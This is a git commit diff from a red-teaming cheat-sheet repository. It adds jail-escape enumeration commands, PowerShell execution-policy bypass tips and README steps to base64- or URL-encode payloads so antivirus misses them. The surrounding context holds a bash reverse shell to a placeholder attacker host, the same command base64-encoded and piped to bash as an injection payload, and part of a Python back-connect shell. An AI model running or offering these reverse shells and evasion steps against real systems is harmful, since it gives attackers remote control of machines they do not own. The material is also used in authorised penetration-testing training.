mirror of
https://github.com/Jieyab89/OSINT-Cheat-sheet.git
synced 2026-02-27 22:02:58 -08:00
change script
This commit is contained in:
@@ -18,3 +18,21 @@ sh -i >& /dev/tcp/<YOUR HOST OR IP>/<PORT> 0>&1
|
|||||||
```
|
```
|
||||||
; echo c2ggLWkgPiYgL2Rldi90Y3AvPFlPVVIgSE9TVCBPUiBJUD4vPFBPUlQ+IDA+JjE= | base64 -d | bash;"
|
; echo c2ggLWkgPiYgL2Rldi90Y3AvPFlPVVIgSE9TVCBPUiBJUD4vPFBPUlQ+IDA+JjE= | base64 -d | bash;"
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Tips escape from jails or hardening server
|
||||||
|
|
||||||
|
### Enum about the jail
|
||||||
|
|
||||||
|
```
|
||||||
|
echo $SHELL
|
||||||
|
echo $PATH
|
||||||
|
env
|
||||||
|
export
|
||||||
|
pwd
|
||||||
|
```
|
||||||
|
|
||||||
|
Source
|
||||||
|
|
||||||
|
- [Hacktrikcs Escaping from Jails](https://hacktricks.boitatech.com.br/linux-unix/privilege-escalation/escaping-from-limited-bash)
|
||||||
|
- [Hacktricks github escape from jails](https://github.com/HackTricks-wiki/hacktricks/blob/master/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md)
|
||||||
|
- [0xffsec restricted-shells](https://0xffsec.com/handbook/shells/restricted-shells/)
|
||||||
@@ -75,10 +75,27 @@ int main(void){
|
|||||||
}
|
}
|
||||||
```
|
```
|
||||||
|
|
||||||
*Pro tips
|
### Enum about the jail
|
||||||
|
|
||||||
|
```
|
||||||
|
echo $SHELL
|
||||||
|
echo $PATH
|
||||||
|
env
|
||||||
|
export
|
||||||
|
pwd
|
||||||
|
```
|
||||||
|
|
||||||
|
*Windows Powershell Pro Tips
|
||||||
|
|
||||||
- If you was gett the shell, change to powershell, you can run
|
- If you was gett the shell, change to powershell, you can run
|
||||||
|
|
||||||
```
|
```
|
||||||
powershell -ep bypass
|
powershell -ep bypass
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Source
|
||||||
|
|
||||||
|
- [Hacktrikcs Escaping from Jails](https://hacktricks.boitatech.com.br/linux-unix/privilege-escalation/escaping-from-limited-bash)
|
||||||
|
- [Hacktricks github escape from jails](https://github.com/HackTricks-wiki/hacktricks/blob/master/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md)
|
||||||
|
- [0xffsec restricted-shells](https://0xffsec.com/handbook/shells/restricted-shells/)
|
||||||
|
- [Hacktrikcs powershell-for-pentesters](https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters)
|
||||||
@@ -19,3 +19,28 @@ https://pastebin.com/bFqVuGwv
|
|||||||
```Linux
|
```Linux
|
||||||
https://pastebin.com/QsSKm2F1
|
https://pastebin.com/QsSKm2F1
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Enum about the jail
|
||||||
|
|
||||||
|
```
|
||||||
|
echo $SHELL
|
||||||
|
echo $PATH
|
||||||
|
env
|
||||||
|
export
|
||||||
|
pwd
|
||||||
|
```
|
||||||
|
|
||||||
|
*Windows Powershell Pro Tips
|
||||||
|
|
||||||
|
- If you was gett the shell, change to powershell, you can run
|
||||||
|
|
||||||
|
```
|
||||||
|
powershell -ep bypass
|
||||||
|
```
|
||||||
|
|
||||||
|
Source
|
||||||
|
|
||||||
|
- [Hacktrikcs Escaping from Jails](https://hacktricks.boitatech.com.br/linux-unix/privilege-escalation/escaping-from-limited-bash)
|
||||||
|
- [Hacktricks github escape from jails](https://github.com/HackTricks-wiki/hacktricks/blob/master/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md)
|
||||||
|
- [0xffsec restricted-shells](https://0xffsec.com/handbook/shells/restricted-shells/)
|
||||||
|
- [Hacktrikcs powershell-for-pentesters](https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters)
|
||||||
@@ -35,3 +35,27 @@ port = <YOUR LISTENER PORT>
|
|||||||
|
|
||||||
back_connect(host, port)
|
back_connect(host, port)
|
||||||
```
|
```
|
||||||
|
### Enum about the jail
|
||||||
|
|
||||||
|
```
|
||||||
|
echo $SHELL
|
||||||
|
echo $PATH
|
||||||
|
env
|
||||||
|
export
|
||||||
|
pwd
|
||||||
|
```
|
||||||
|
|
||||||
|
*Windows Powershell Pro Tips
|
||||||
|
|
||||||
|
- If you was gett the shell, change to powershell, you can run
|
||||||
|
|
||||||
|
```
|
||||||
|
powershell -ep bypass
|
||||||
|
```
|
||||||
|
|
||||||
|
Source
|
||||||
|
|
||||||
|
- [Hacktrikcs Escaping from Jails](https://hacktricks.boitatech.com.br/linux-unix/privilege-escalation/escaping-from-limited-bash)
|
||||||
|
- [Hacktricks github escape from jails](https://github.com/HackTricks-wiki/hacktricks/blob/master/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md)
|
||||||
|
- [0xffsec restricted-shells](https://0xffsec.com/handbook/shells/restricted-shells/)
|
||||||
|
- [Hacktrikcs powershell-for-pentesters](https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters)
|
||||||
@@ -12,5 +12,7 @@ Welcome to path red teaming or pentesting for OSINT, on this path there are scri
|
|||||||
6. Check the compiler on the target
|
6. Check the compiler on the target
|
||||||
7. If AV is detected then you can encode into base64, url encode or try to enumerate what caused the payload to be detected such as checking functions, commands and others.
|
7. If AV is detected then you can encode into base64, url encode or try to enumerate what caused the payload to be detected such as checking functions, commands and others.
|
||||||
8. Change the port listener to bigger
|
8. Change the port listener to bigger
|
||||||
|
9. If there is a restrictions you should to bypass
|
||||||
|
10. If you have successfully connected with target, swtich to powershell if the Windows, if Linux switch to fully tty shell
|
||||||
|
|
||||||
## Soon will added (tamplate )
|
## Soon will added (tamplate)
|
||||||
Reference in New Issue
Block a user